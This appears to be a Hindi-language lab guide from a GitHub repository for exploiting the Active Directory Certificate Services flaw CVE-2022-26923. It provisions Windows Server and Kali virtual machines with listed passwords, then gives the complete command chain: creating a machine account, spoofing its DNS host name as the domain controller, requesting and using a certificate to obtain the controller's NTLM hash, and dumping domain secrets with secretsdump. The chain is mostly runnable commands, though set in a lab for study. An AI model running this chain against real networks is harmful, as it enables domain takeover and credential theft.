
CVE-2022-26923 के लिए शोषण
CVE-2022-26923 सक्रिय निर्देशिका प्रमाणपत्र सेवाओं (AD CS) में एक भेद्यता है जो एक हमलावर को प्रमाणपत्र-आधारित प्रमाणीकरण का दुरुपयोग करके विशेषाधिकार बढ़ाने की अनुमति देती है। यह मार्गदर्शिका Impacket और Certipy का उपयोग करके इस भेद्यता का शोषण करने के चरणों की रूपरेखा प्रस्तुत करती है।
| वर्चुअल मशीन | उपयोगकर्ता नाम | पासवर्ड |
|---|---|---|
| Windows Server | Administrator | !@windowsadmintest101 |
| Windows Server | testuser | $Vulnerable139 |
| Kali-Linux VM | vagrant | vagrant |
सबसे पहले, आवश्यक फ़ाइलों वाली रिपॉजिटरी क्लोन करें:
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng
रिपॉजिटरी में दो फ़ोल्डर हैं, प्रत्येक में वर्चुअल मशीनों को प्रावधान करने के लिए एक Vagrantfile है। आगे बढ़ने से पहले आपको अपने होस्ट मशीन पर Vagrant इंस्टॉल करना होगा।
Vagrant को यहाँ से डाउनलोड और इंस्टॉल करें। या PowerShell का उपयोग करके इंस्टॉल करें:
choco install vagrant
sudo apt update && sudo apt install vagrant -y
WindowsServer2022 निर्देशिका में नेविगेट करें:
cd WindowsServer2022
vagrant up
यह VirtualBox में Windows Server 2022 VM को डाउनलोड और सेट अप करेगा।
Kali-LinuxVM निर्देशिका में नेविगेट करें:
cd Kali-LinuxVM
vagrant up
चूंकि शोषण के लिए NAT नेटवर्क की आवश्यकता होती है, VirtualBox को निम्नानुसार कॉन्फ़िगर करें:
नीचे दिया गया कमांड चलाने से पहले, सुनिश्चित करें कि VBoxManage आपके पर्यावरण चर में जोड़ा गया है। यदि नहीं, तो कमांड को उसके पूर्ण पथ का उपयोग करके निष्पादित करें:
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
यदि VBoxManage पहचाना नहीं जाता है, तो उपयोग करें:
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
सुनिश्चित करें कि VirtualBox में दोनों VM की जाँच करें और वे नेटवर्क एडाप्टर NatNetwork - NatNet1 को सौंपे गए हैं।
आगे बढ़ने से पहले, सुनिश्चित करें कि Windows Server 2022 और Kali Linux VM दोनों चालू हैं।
हमला शुरू करने के लिए Kali Linux VM तक पहुँचें।
डोमेन कंट्रोलर के IP को मैप करने के लिए अपनी /etc/hosts फ़ाइल अपडेट करें:
sudo nano /etc/hosts
निम्नलिखित प्रविष्टि जोड़ें:
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
सहेजें और बाहर निकलें।
CVE-26923 निर्देशिका में नेविगेट करें और Python वर्चुअल वातावरण सक्रिय करें:
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate
Impacket के addcomputer उपयोगिता का उपयोग करके:
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'
ssh [email protected]
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
डोमेन कंप्यूटरों की जाँच करें:
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121
bloodyAD निर्देशिका में नेविगेट करें और PCTEST1 को डोमेन में जोड़ने के लिए bloodyAD.py का उपयोग करें:
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'
सत्यापित करें कि PCTEST1 को डोमेन को सौंपा गया है:
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121
भेद्य प्रमाणपत्र खोजने के लिए Certipy का उपयोग करें:
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'
Certipy का उपयोग करके एक मशीन प्रमाणपत्र का अनुरोध करें:
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA
प्राप्त प्रमाणपत्र का उपयोग करके प्रमाणीकरण करें:
certipy auth -pfx server2022.pfx
certipy auth कमांड चलाने के बाद, दो हैश प्रदर्शित होंगे। NTLM प्रमाणीकरण के लिए दाईं ओर वाले हैश का उपयोग किया जाएगा।
उदाहरण हैश आउटपुट:
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7
क्रेडेंशियल्स डंप करने के लिए निकाले गए NTLM हैश का उपयोग करें:
impacket-secretsdump '[email protected]' -hashes :69079fd4946af567d682d61e121f29e7
यह CVE-2022-26923 के शोषण के लिए पूरी हमले की श्रृंखला को पूरा करता है।